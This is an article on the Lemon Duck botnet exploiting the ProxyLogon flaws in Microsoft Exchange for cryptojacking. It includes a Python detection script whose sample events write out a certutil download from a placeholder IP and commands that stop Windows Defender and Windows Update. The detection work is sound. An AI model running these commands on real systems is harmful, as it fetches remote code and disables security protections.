The Cisco Talos intelligence group has discovered an attack that may have been taking advantage of weaknesses in Microsoft Exchange Server since last April. The culprit is Lemon Duck, a botnet that had already been seen in March exploiting vulnerable servers and using those systems to mine cryptocurrency (a technique also known as cryptojacking).
Focusing on this latest attack against Exchange Server vulnerabilities, Cisco Talos explains that its findings show Lemon Duck taking advantage of zero-day vulnerabilities in Microsoft Exchange Server, and that this represents a security disaster for thousands of organizations.
Four critical flaws, collectively called ProxyLogon, affect Microsoft Exchange Server 2013, 2016 and 2010. Patches, vulnerability detection tools and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised.
Cryptocurrency mining through the flaws
Cisco Talos has found that Lemon Duck was still exploiting the bugs disclosed in March as late as April. Lemon Duck operators are reportedly adding new tools to "maximize the effectiveness of their campaigns" by targeting high-severity vulnerabilities in Microsoft Exchange Server, and telemetry based on DNS queries to Lemon Duck domains indicates that campaign activity soared in April.
Most of those queries came from the United States, followed by Europe and Southeast Asia. Lemon Duck operators use automated tools to scan for, identify and exploit servers before deploying payloads such as Cobalt Strike DNS beacons and web shells, which in turn lead to the execution of cryptocurrency mining software and additional malware.
As reported by ZDNet, the malware and its associated PowerShell scripts also try to remove antivirus products from vendors such as ESET and Kaspersky, and they stop any services, including Windows Update and Windows Defender, that could hinder an infection attempt.
In these recent campaigns, the CertUtil command-line utility is used to download two new PowerShell scripts that handle AV product removal, create persistence routines and download a variant of the XMRig cryptocurrency miner.
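The two behaviours described above, CertUtil fetching scripts from a URL and scripted stopping of Windows Defender and Windows Update, are the kind of host telemetry a defender can alert on. The following is an added detection example, not code from Cisco Talos or ZDNet; it runs over constructed Sysmon-style process-creation events (parent image, image, command line), and the service names WinDefend and wuauserv are the standard Windows names for the two services the article mentions.

```python
import re

# Constructed sample process-creation events (synthetic, not real telemetry).
# Each entry: parent image | image | command line, as a Sysmon event 1 summary.
SAMPLE_EVENTS = [
    r"powershell.exe|certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.5/a.ps1 C:\Users\Public\a.ps1",
    r"powershell.exe|sc.exe|sc.exe stop WinDefend",
    r"cmd.exe|net.exe|net stop wuauserv",
    r"powershell.exe|powershell.exe|powershell -nop -c 'Stop-Service -Name WinDefend -Force'",
    r"explorer.exe|certutil.exe|certutil.exe -verify C:\certs\corp.cer",
    r"services.exe|svchost.exe|svchost.exe -k netsvcs",
]

# Services the article says the scripts stop (WinDefend = Windows Defender, wuauserv = Windows Update).
PROTECTED_SERVICES = {"windefend", "wuauserv"}

# certutil combined with -urlcache and a URL is the living-off-the-land download pattern.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\s.*-urlcache.*https?://", re.IGNORECASE)
# "sc stop <svc>", "net stop <svc>" or PowerShell "Stop-Service [-Name] <svc>".
SERVICE_STOP = re.compile(
    r"(?:\b(?:sc|net)(?:\.exe)?\s+stop\s+(\S+)|stop-service\s+(?:-name\s+)?[\"']?([A-Za-z0-9_]+))",
    re.IGNORECASE,
)

def classify_event(event: str) -> list:
    """Return the detection labels that fire for one event (empty list means benign)."""
    parent, _image, cmdline = event.split("|", 2)
    labels = []
    if CERTUTIL_DOWNLOAD.search(cmdline):
        labels.append("certutil_download")
    match = SERVICE_STOP.search(cmdline)
    if match:
        service = (match.group(1) or match.group(2)).lower()
        if service in PROTECTED_SERVICES:
            labels.append("stop_protected_service:" + service)
    # A scripting host as the parent is stronger evidence of scripted tampering.
    if labels and parent.lower() in {"powershell.exe", "cmd.exe"}:
        labels.append("script_parent")
    return labels

def scan(events) -> dict:
    """Map each flagged event to its labels; benign events are omitted."""
    flagged = {}
    for event in events:
        labels = classify_event(event)
        if labels:
            flagged[event] = labels
    return flagged

if __name__ == "__main__":
    for event, labels in scan(SAMPLE_EVENTS).items():
        print(labels, "<-", event.split("|", 2)[2])
```

Legitimate certutil use (certificate verification) and ordinary service-host activity in the sample pass through unflagged, which is the false-positive check worth keeping when the rule is ported to a real SIEM.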
Taking advantage of the Exchange Server issues reported in March
After several Microsoft Exchange Server zero-day vulnerabilities were made public on March 2, Cisco Talos and other security researchers began observing various threat actors, including Lemon Duck, exploiting these vulnerabilities for their initial compromise.
According to initial reports, a China-based hacking group, Hafnium, was attacking servers in various countries around the world through this Redmond software. That campaign affected Exchange Server versions 2013 through 2019.
Later, in late March, Microsoft said that the Lemon Duck botnet had been observed exploiting vulnerable servers and using those systems to mine cryptocurrency.
A solution from Redmond that seems to have been insufficient
To deal with this attack on Exchange Server, Microsoft released in mid-March a one-click local mitigation tool for Microsoft Exchange Server, meaning that companies using Exchange services can install the updates released by the company "in a single click".
In this way, IT administrators in enterprise environments can apply the Redmond firm's new security patches to all of the organization's machines with a simple installation. It was not presented as a final solution, but as a way to mitigate the possible impact of this attack while the update containing the patches is applied.